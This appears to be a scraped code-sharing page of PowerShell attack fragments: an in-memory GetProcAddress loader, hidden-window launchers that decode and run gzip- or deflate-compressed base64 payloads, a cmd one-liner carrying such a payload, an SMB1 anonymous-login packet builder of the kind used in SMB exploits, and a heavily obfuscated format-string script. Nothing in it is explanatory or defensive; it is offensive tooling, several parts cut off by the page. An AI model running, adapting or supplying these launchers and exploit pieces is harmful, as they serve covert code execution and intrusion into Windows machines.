This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function sOH { | |
Param ($o73, $icO) | |
$zJ3 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
return $zJ3.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($zJ3.GetMethod('GetModuleHandle')).Invoke($null, @($o73)))), $icO)) | |
} | |
function b9MW { | |
Param ( | |
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $feiNr, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
H4sIAAb/EF0CA7VWa2+bSBT9nEj5D6iyBCjExombNpEqLdgmhhrHBD9iu9YKwwBTj4HC4Jh0+9/3jg1p | |
qqS77UqLbDGP+zz3zFz8PHIpjiMuu+1xX0+Oj4ZO6mw4oRa/u5C4GnZvxaMjWK49GhfcB05YKEnSiTcO | |
jpbX1+08TVFED/P6DaJKlqHNimCUCSL3FzcNUYrOblefkUu5r1ztz/oNiVcOKcWKtuOGiDtTIo/t9WPX | |
YaHU7YRgKvCfPvHi4qy5rHe/5A7JBN4uMoo2dY8QXuS+iczhqEiQwJvYTeMs9ml9iqOL8/o4yhwfDcDa | |
FpmIhrGX8SIkAb8U0TyNOJYO0z/sCjwMh2nsKp6XoizjJW7BLC+Wyz+ERen2Lo8o3qC6HlGUxomN0i12 | |
UVbvOZFH0B3yl6Bl0xRHwVIUQWwbr5FQi3JCJO53zAgD9FCB9qtKwnMlkBrSVJSgii/TNGMvJ+igyL8S | |
Jyu8CE9ZfIDt28nxybFf8WR1ZU6fEwVGR4v9GEFswjDO8F7uAydLnAluHBqnBUxrozRH4vIJWa7mIzxI | |
pZ8baFbSIBs/3K/nsLaYxNhbgk5Zz1roPIxabOPnxOwgH0eoU0TOBrsV94TXYEY+Qfs065XYAMIS+HID | |
eR1EUOBQhhyr9gu17gbTJ101x8RDqeJCqTKICqoo/hjMoRgCr0cm2gBMhznQr+YD41ElXbK8qLyzOQjx | |
beJkmcQNczhyrsTZyCHIkzglynC5peQ03g/57+GaOaHYdTJamVuKT0CWDttxlNE0d6F0kPzITpCLHcKw |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$s.UseShellExecute=$false; | |
$s.RedirectStandardOutput=$true; | |
$s.WindowStyle='Hidden'; | |
$s.CreateNoWindow=$true; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
&([scriptblock]::create(( | |
New-Object IO.StreamReader( | |
New-Object IO.Compression.GzipStream(( | |
New-Object IO.MemoryStream(, | |
[Convert]::FromBase64String( | |
''...BASE64GZIPDATA...'' | |
))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$s = New-Object System.Diagnostics.ProcessStartInfo; | |
$s.FileName = $b; | |
$s.Arguments='-noni -nop -w hidden -c |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if ([IntPtr]::Size -eq 4) { | |
$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe' | |
}else{ | |
$b='powershell.exe' | |
}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c if([IntPtr] | |
::Size -eq 4){=:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{= | |
'powershell.exe'};=New-Object System.Diagnostics.ProcessStartInfo;.FileName=;.Ar | |
guments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamRe | |
ader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert] | |
::FromBase64String(''H4sIAAb/EF0CA7VWa2+bSBT9nEj5D6iyBCjExombNpEqLdgmhhrHBD9iu9Y | |
KwwBTj4HC4Jh0+9/3jg1pqqS77UqLbDGP+zz3zFz8PHIpjiMuu+1xX0+Oj4ZO6mw4oRa/u5C4GnZvxaM | |
jWK49GhfcB05YKEnSiTcOjpbX1+08TVFED/P6DaJKlqHNimCUCSL3FzcNUYrOblefkUu5r1ztz/oNiVc | |
OKcWKtuOGiDtTIo/t9WPXYaHU7YRgKvCfPvHi4qy5rHe/5A7JBN4uMoo2dY8QXuS+iczhqEiQwJvYTeM | |
s9ml9iqOL8/o4yhwfDcDaFpmIhrGX8SIkAb8U0TyNOJYO0z/sCjwMh2nsKp6XoizjJW7BLC+Wyz+ERen |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function make_smb1_anonymous_login_packet { | |
[Byte[]] $pkt = [Byte[]] (0x00) | |
$pkt += 0x00,0x00,0x48 | |
$pkt += 0xff,0x53,0x4D,0x42 | |
$pkt += 0x73 | |
$pkt += 0x00,0x00,0x00,0x00 | |
$pkt += 0x18 | |
$pkt += 0x01,0x48 | |
$pkt += 0x00,0x00 | |
$pkt += 0x00,0x00,0x00,0x00 |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
((("{2070}{2069}{563}{1918}{1769}{1682}{51}{1258}{1854}{1127}{1374}{1599}{1168}{2427}{2098}{1823}{2257}{2997}{452}{1256}{1131}{155}{2084}{2946}{329}{1855}{1104}{1390}{1332}{1988}{202}{1781}{893}{2363}{2718}{818}{1334}{1965}{2542}{1164}{815}{772}{2274}{1214}{840}{2930}{2375}{384}{157}{2030}{2906}{2349}{2814}{1251}{2462}{1955}{3018}{687}{1636}{2950}{640}{1724}{2966}{2903}{992}{2636}{773}{1858}{2743}{1340}{561}{365}{521}{2341}{72}{442}{951}{944}{2160}{473}{2521}{806}{1311}{2348}{2126}{923}{2014}{2687}{2933}{845}{867}{742}{423}{2627}{624}{2144}{874}{2410}{330}{1267}{2233}{616}{713}{1878}{1562}{2617}{1917}{575}{841}{2109}{1109}{2161}{1587}{1272}{538}{2880}{532}{727}{886}{200}{737}{1150}{1972}{2001}{603}{2866}{2988}{963}{1830}{1441}{2618}{11}{753}{1021}{1305}{2021}{243}{2479}{919}{2548}{2059}{1569}{1968}{958}{2782}{1762}{2208}{2206}{2215}{814}{1748}{310}{1662}{299}{690}{1230}{1704}{1770}{1426}{1749}{2663}{1111}{1804}{2450}{2529}{2555}{1564}{735}{3006}{1579}{2776}{1120}{2853}{1399}{1210}{2220}{2231}{1186}{2262}{189 |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0q2trY9+8d7Og51fQv9++vCX/OL7n977Jb949+HuAf37AB/sfnqwRx/v0m979/Hpwf19+nd37wH9e+8Bfr//EO2oIQHZx+d7Ow+55R7B2tu7j08ePqR/9+/vMZhP0fweQN6/j9YH+2ixTx/f2wOoA3y8u7sD4Pce7uDfe3jz4QG62MGvDw7o9YOH6OAeUN57AJQPGO979/Diw08B+/4+Wu9+uo8v6YMHD/aAE+O9t4tP9zH2h/fw770H1OLeAY+Jh8GfPtz5FN/tE2Z7B7v8Isixt/8p4wRc7+2g408PQJNP76H5w/v06qeAvftgj4f3KX+8Q7g+fAgcuN2DByD3AQhLOOH3e3jn/qfUwT0M4P7eLndO/wLzfQznIbp/uA+ou59S630A2eOWB8CVSCsvAeruHn3ykGdiB8jvMZY04HsYO/Vw8Cn9/QBw97nVp5jBTxnnXfRxAFrt7e9SR/dADwIIAHsA8OkuxrDLY3gA0t//lIe2C0I8xL/3QdIDoL+3u8Nsgn8Jb559JtgeBnb/HpA9OMDgMdcPgMXBAWi2Q589uIeWuyDq7kOewp0dgvApyLl3IKQFczxk9j1gPPe510+ZJUC++/hqB1TavbfDfMe0BdX39h8QVg93gdp9JtvOfSB7nyXgITj7ocwRhIEEg5lo54D/Red74C1hjgd4/x7Itfspt4N0fMpcvMd4PWC+fgCZ293H7NAr6PhTxn0XuO4e7DDRMV6aWEa |